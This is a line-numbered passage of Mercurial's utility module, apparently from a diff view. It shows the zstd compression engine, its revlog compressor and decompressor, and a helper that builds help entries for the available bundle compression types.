3681 3683 # Force delayed import.
3682 3684 zstd.__version__
3683 3685 return zstd
3684 3686 except ImportError:
3685 3687 return None
3686 3688
3687 3689 def available(self):
3688 3690 return bool(self._module)
3689 3691
3690 3692 def bundletype(self):
3691 3693 """A modern compression algorithm that is fast and highly flexible.
3692 3694
3693 3695 Only supported by Mercurial 4.1 and newer clients.
3694 3696
3695 3697 With the default settings, zstd compression is both faster and yields
3696 3698 better compression than ``gzip``. It also frequently yields better
3697 3699 compression than ``bzip2`` while operating at much higher speeds.
3698 3700
3699 3701 If this engine is available and backwards compatibility is not a
3700 3702 concern, it is likely the best available engine.
3701 3703 """
3702 3704 return 'zstd', 'ZS'
3703 3705
3704 3706 def wireprotosupport(self):
3705 3707 return compewireprotosupport('zstd', 50, 50)
3706 3708
3707 3709 def revlogheader(self):
3708 3710 return '\x28'
3709 3711
3710 3712 def compressstream(self, it, opts=None):
3711 3713 opts = opts or {}
3712 3714 # zstd level 3 is almost always significantly faster than zlib
3713 3715 # while providing no worse compression. It strikes a good balance
3714 3716 # between speed and compression.
3715 3717 level = opts.get('level', 3)
3716 3718
3717 3719 zstd = self._module
3718 3720 z = zstd.ZstdCompressor(level=level).compressobj()
3719 3721 for chunk in it:
3720 3722 data = z.compress(chunk)
3721 3723 if data:
3722 3724 yield data
3723 3725
3724 3726 yield z.flush()
3725 3727
3726 3728 def decompressorreader(self, fh):
3727 3729 zstd = self._module
3728 3730 dctx = zstd.ZstdDecompressor()
3729 3731 return chunkbuffer(dctx.read_from(fh))
3730 3732
3731 3733 class zstdrevlogcompressor(object):
3732 3734 def __init__(self, zstd, level=3):
3733 3735 # Writing the content size adds a few bytes to the output. However,
3734 3736 # it allows decompression to be more optimal since we can
3735 3737 # pre-allocate a buffer to hold the result.
3736 3738 self._cctx = zstd.ZstdCompressor(level=level,
3737 3739 write_content_size=True)
3738 3740 self._dctx = zstd.ZstdDecompressor()
3739 3741 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3740 3742 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3741 3743
3742 3744 def compress(self, data):
3743 3745 insize = len(data)
3744 3746 # Caller handles empty input case.
3745 3747 assert insize > 0
3746 3748
3747 3749 if insize < 50:
3748 3750 return None
3749 3751
3750 3752 elif insize <= 1000000:
3751 3753 compressed = self._cctx.compress(data)
3752 3754 if len(compressed) < insize:
3753 3755 return compressed
3754 3756 return None
3755 3757 else:
3756 3758 z = self._cctx.compressobj()
3757 3759 chunks = []
3758 3760 pos = 0
3759 3761 while pos < insize:
3760 3762 pos2 = pos + self._compinsize
3761 3763 chunk = z.compress(data[pos:pos2])
3762 3764 if chunk:
3763 3765 chunks.append(chunk)
3764 3766 pos = pos2
3765 3767 chunks.append(z.flush())
3766 3768
3767 3769 if sum(map(len, chunks)) < insize:
3768 3770 return ''.join(chunks)
3769 3771 return None
3770 3772
3771 3773 def decompress(self, data):
3772 3774 insize = len(data)
3773 3775
3774 3776 try:
3775 3777 # This was measured to be faster than other streaming
3776 3778 # decompressors.
3777 3779 dobj = self._dctx.decompressobj()
3778 3780 chunks = []
3779 3781 pos = 0
3780 3782 while pos < insize:
3781 3783 pos2 = pos + self._decompinsize
3782 3784 chunk = dobj.decompress(data[pos:pos2])
3783 3785 if chunk:
3784 3786 chunks.append(chunk)
3785 3787 pos = pos2
3786 3788 # Frame should be exhausted, so no finish() API.
3787 3789
3788 3790 return ''.join(chunks)
3789 3791 except Exception as e:
3790 3792 raise error.RevlogError(_('revlog decompress error: %s') %
3791 3793 str(e))
3792 3794
3793 3795 def revlogcompressor(self, opts=None):
3794 3796 opts = opts or {}
3795 3797 return self.zstdrevlogcompressor(self._module,
3796 3798 level=opts.get('level', 3))
3797 3799
3798 3800 compengines.register(_zstdengine())
3799 3801
3800 3802 def bundlecompressiontopics():
3801 3803 """Obtains a list of available bundle compressions for use in help."""
3802 3804 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3803 3805 items = {}
3804 3806
3805 3807 # We need to format the docstring. So use a dummy object/type to hold it
3806 3808 # rather than mutating the original.
3807 3809 class docobject(object):
3808 3810 pass
3809 3811
3810 3812 for name in compengines:
3811 3813 engine = compengines[name]
3812 3814
3813 3815 if not engine.available():
3814 3816 continue
3815 3817
3816 3818 bt = engine.bundletype()
3817 3819 if not bt or not bt[0]:
3818 3820 continue
3819 3821
3820 3822 doc = pycompat.sysstr('``%s``\n %s') % (
3821 3823 bt[0], engine.bundletype.__doc__)
3822 3824
3823 3825 value = docobject()
3824 3826 value.__doc__ = doc
3825 3827 value._origdoc = engine.bundletype.__doc__
3826 3828 value._origfunc = engine.bundletype
3827 3829
3828 3830 items[bt[0]] = value
3829 3831
3830 3832 return items
3831 3833
3832 3834 i18nfunctions = bundlecompressiontopics().values()
3833 3835
3834 3836 # convenient shortcut
3835 3837 dst = debugstacktrace